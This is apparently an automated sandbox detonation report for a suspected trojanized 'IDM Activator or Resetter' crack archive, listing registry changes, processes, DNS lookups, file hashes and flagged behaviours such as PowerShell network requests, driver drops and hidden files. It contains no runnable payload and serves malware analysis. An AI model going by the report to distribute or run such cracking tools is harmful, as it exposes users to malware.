Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

memory/480-0-0x0000019CC3060000-0x0000019CC3070000-memory.dmp

memory/480-16-0x0000019CC3160000-0x0000019CC3170000-memory.dmp

memory/480-35-0x0000019CCB390000-0x0000019CCB391000-memory.dmp

memory/480-37-0x0000019CCB4D0000-0x0000019CCB4D1000-memory.dmp

memory/480-39-0x0000019CCB4D0000-0x0000019CCB4D1000-memory.dmp

memory/480-40-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-41-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-42-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-43-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-44-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-45-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-46-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-47-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-48-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-49-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-50-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-51-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-52-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-53-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-54-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-55-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-56-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-57-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-58-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-60-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-59-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-61-0x0000019CCB510000-0x0000019CCB511000-memory.dmp

memory/480-62-0x0000019CCB510000-0x0000019CCB511000-memory.dmp

memory/480-63-0x0000019CCB520000-0x0000019CCB521000-memory.dmp

memory/480-64-0x0000019CCB580000-0x0000019CCB581000-memory.dmp

memory/480-65-0x0000019CCB570000-0x0000019CCB571000-memory.dmp

memory/3364-74-0x0000026358FB0000-0x0000026358FD0000-memory.dmp

memory/3364-78-0x0000026358F70000-0x0000026358F90000-memory.dmp

memory/3364-80-0x0000026359500000-0x0000026359520000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\W07I75NR\microsoft.windows[1].xml

MD5 6d4f289794a2dafbc77e288c4cf4b08f
SHA1 76b9d65ae2e966768de90478bd4f38d2802fd5db
SHA256 e717849808eb8bc9f9723ca6b1bd9bc3d4c17bf1d80d03c994b7f32a1e86af0e
SHA512 d88973a063e7305e3ba732446274a87b8e0febf64f89b71944c6c64ee675b3ef14fe5304f0a78b95541a276dda5895ccc2ed21e0b29837097f8dd00c8ec0bb9f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 c88bfd708614b1f2860d02d6714d6792
SHA1 38f37f69c3ec578431892b7f45a06e4d828f6fc9
SHA256 5e87c61af484373617f98f7d8a91733626ffa0b0d966543675f4f7851e8f1bf8
SHA512 11ee934914b048d72ee2621b838785d075e27992ef40f1da446676b05ca3489c9f3f0b60a821076c914d5fa75ee7f968e79d7570df53d85094100de5ee58f477

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133575355469175825.txt

MD5 4c036314f080c753345c8481caf9ae5f
SHA1 c90add2903b9de1bfac12a139e2551af8ec71745
SHA256 ca7a49706055df15b0d7f15795ca9846c18f76f20ce135c039f99096bf164b71
SHA512 2c42b710436c2153a935fdbee7399177deca03c9c877cff99ef2dfa237fc7da5cc0dfbd93129122b268f8eda79f34e41ea5f9c901e5dee35861a2c9dce09bc38

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

MD5 6a42fb4a4caf54e622ad0f1e1b341aff
SHA1 547c7c0c16c36520720ffbb5049b019044cdf066
SHA256 45b5cf01440127ff6f8227e64059c6d472d1cd7904645ad633b101fe588dc8d7
SHA512 d66412747a5ae171fc0a2198e00474c5e36984c934de20c5e435b6089d25f69fe2fb9f185f5d139b2dd706f1e4d69c55f05e1a6bfecae057edeb110fabf4eb7b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 a0c0ba8c88fe71bdf0898f98b8fb3df8
SHA1 700cc032ab3be50fa9488d24352b4be9588b762b
SHA256 960c439791f2b8dd492b4e8e489a15ed40f086916df71245144e99a0de089fa3
SHA512 38dd28f528409f98e01f2613a9c264431ed81f32fef6eb7bda0c8cefc9a1fa4891baf34a7f11efafdde67f265b5ae935ce00023444abc036a47b881d4049761b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{018d39de-2be3-412b-97a2-a4148fae55b0}\appssynonyms.txt

MD5 06a69ad411292eca66697dc17898e653
SHA1 fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA256 2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512 ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{018d39de-2be3-412b-97a2-a4148fae55b0}\appsglobals.txt

MD5 931b27b3ec2c5e9f29439fba87ec0dc9
SHA1 dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256 541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA512 4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

MD5 8156dab2a3ae61d357e3ce1d636a178e
SHA1 439539db78cab9461746ff07db3b621273c13b05
SHA256 79cd26ed83f4682e5d57337de810e204d1a516afe6c3bcad870bc1df52f9e8e2
SHA512 33b87ab43f45eb8578605659a495ddedba3b78e1ceeff00d3a969d9c4118d4d6b4e3ac8732ebb148938766602d9278567273cfbd930c7fd1c12cbab9adae162f

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

MD5 da8fd2b901cc194b9c51ed1d13056044
SHA1 400a11ac8387106d10b5e256693dbf921fb870d2
SHA256 d289fcde2e193a1cc9397044d9e9e53c5e38ed19814126442cd1fee94145cba9
SHA512 27920cc5a4b80e4c0d34b841054ced645477ab637c2a3e41865ba719187eaabb4f1186288e330ffd56f6439283e2eb3f3c1c2d843fd2cc5ddf66d24c193a71b1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\apps.schema

MD5 1659677c45c49a78f33551da43494005
SHA1 ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA256 5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512 740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\apps.csg

MD5 5475132f1c603298967f332dc9ffb864
SHA1 4749174f29f34c7d75979c25f31d79774a49ea46
SHA256 0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA512 54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\appsconversions.txt

MD5 2bef0e21ceb249ffb5f123c1e5bd0292
SHA1 86877a464a0739114e45242b9d427e368ebcc02c
SHA256 8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512 f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingssynonyms.txt

MD5 003ece80b3820c43eb83878928b8469d
SHA1 790af92ff0eb53a926412e16113c5d35421c0f42
SHA256 12d00eee26e5f261931e51cfa56e04c54405eb32d1c4b440e35bd2b48d5fcf07
SHA512 b2d6d9b843124f5e8e06a35a89e34228af9e05cbfa2ae1fe3d9bc4ddbebda4d279ce52a99066f2148817a498950e37a7f0b73fe477c0c6c39c7016aa647079a5

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingsglobals.txt

MD5 bbeadc734ad391f67be0c31d5b9cbf7b
SHA1 8fd5391c482bfbca429aec17da69b2ca00ed81ae
SHA256 218042bc243a1426dd018d484f9122662dba2c44a0594c37ffb3b3d1d0fb454a
SHA512 a046600c7ad6c30b003a1ac33841913d7d316606f636c747a0989425697457b4bc78da6607edd4b8510bd4e9b86011b5bd108a5590a2ba722d44e51633ed784f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingsconversions.txt

MD5 721134982ff8900b0e68a9c5f6f71668
SHA1 fca3e3eb8f49dd8376954b499c20a7b7cad6b0f1
SHA256 2541db95c321472c4cb91864cdfa2f1ed0f0069ac7f9cec86e10822283985c13
SHA512 5d1c305b938e52a82216b3d0cee0eead2dc793fac35da288061942b2bd281fb48c7bd18f5fdaa93a88aa42c88b2a0cce1f0513effb193782670d46164d277a59

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settings.schema

MD5 ac68ac6bffd26dbea6b7dbd00a19a3dd
SHA1 a3d70e56249db0b4cc92ba0d1fc46feb540bc83f
SHA256 d6bdeaa9bc0674ae9e8c43f2e9f68a2c7bb8575b3509685b481940fda834e031
SHA512 6c3fcce2f73e9a5fc6094f16707109d03171d4a7252cf3cb63618243dbb25adb40045de9be27cad7932fd98205bdaf0f557d282b2ba92118bba26efcf1cd2a02

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settings.csg

MD5 411d53fc8e09fb59163f038ee9257141
SHA1 cb67574c7872f684e586b438d55cab7144b5303d
SHA256 1844105bb927dbc405685d3bf5546be47fa2fc5846b763c9f2ba2b613ec6bc48
SHA512 67b342c434d8f3a8b9e9ac8a4cbd4c3ef83ddfc450fe7e6ad6f375dba9c8a4977a15a08b49f5ad7644fbde092396e6da08865aa54d399836e5444cb177a33444

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 8911393412534ab71e1ae7b44bc61dc5
SHA1 6fc2f5af924844c6cf1936a9141a2c2f26e434a5
SHA256 c5b5c3d09d7b5a24ad216cb65e897d2c91a0d965dd063cdf3e5c81670c0befed
SHA512 3f37b146b0930ff422a88d2359e3ca85819274d0d96eecd0d01c861f8e51af9328ec07109c4670a0575bb97f120f573a56cda125e6b5bd9700cc1bc785c0b55f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 adbcfa9246c86d31659fd87bd0bdb1f9
SHA1 63a2731cba12b9f4cc992b711953565275274390
SHA256 513367026c29643ee4b1c6fbe1399642256cd9bb4b83b27c8cb57026283e3a5e
SHA512 58a25954ee21aa87afadbf977112b44173312b7cb3f9b53383a675e760b2f46a821e662f8b906d5ea2e2c96336fdbca0116528609a4007dbfc0468c32733bc6d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json.~tmp

MD5 f8c4f70069e3c70d5aeb79350e4d51a0
SHA1 0ca9b6467c93fc6f1b0c6ad9611c2728c245b9ff
SHA256 6b49268c7ee54819d0e9f3663a68d9d1ebe8f5a23cadcb697841c697c9b5b6b0
SHA512 998e37a856184a80b261888804855d2ecda0ec6a7689034e21cbd432e3b85bef205393dc3aac2a7fa0bf4f785de86ba9020e4e3f21b9261cf4df4f5cd86c332b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 344b79834f10c176549586090edeeda0
SHA1 4c9eef7e50c4e9885ad0a247877bd309a0167735
SHA256 1c6afafb1125f3cc8811f2455a1c1e31ee4e1b8d397d2ddea6e59ea9b8487b04
SHA512 3391905b567d5baa9dfc347d26d1a12dfa5933b4762a87fd9f4cf6bfc5cf47bd726b2196d36ee0cfb7740c91aab6972e90717e96d3ff30acd22efa3a55ce8b93

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 aea02b37f539dcab5432ad3e1f768e12
SHA1 3c1a38f238f41cb9c549b2d2c8e1687b90e87e2e
SHA256 81a3c7842458f96b6780f1dfa1e6383a1a2b4cd4e133587504f527c70d8f9779
SHA512 7ebb79017402e8bca3a9f7fc64b561e48873d24a995444af1d3f6973fc4977be0c5ef9259859fcd4a95c107da4676014a050e530e186b142f7f9ee8a91552790

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 6b7817a6b1011aa892174829df7f5f82
SHA1 bb41e075240e0af1e47aaf2b87fbd28a06298788
SHA256 93fd3564f2db3974b30450562e3146b4020e2acc0f819ca2ced39f5e431632d7
SHA512 cb69263110207e1b390f106f993ab4eebd69b8a8299dc7d0c9a6021ebd7e7ed0167e639f1ef2babca68fc031023689c0bf606f27f79020a078e8ef62d61b3cb9

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 02:27

Reported

2024-04-14 02:33

Platform

win7-20240221-en

Max time kernel

289s

Max time network

213s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\DRIVERS\SET944.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET4D94.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET58DA.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET6CC7.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET6CC7.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET944.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET58DA.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET4D94.tmp C:\Windows\system32\RUNDLL32.EXE N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
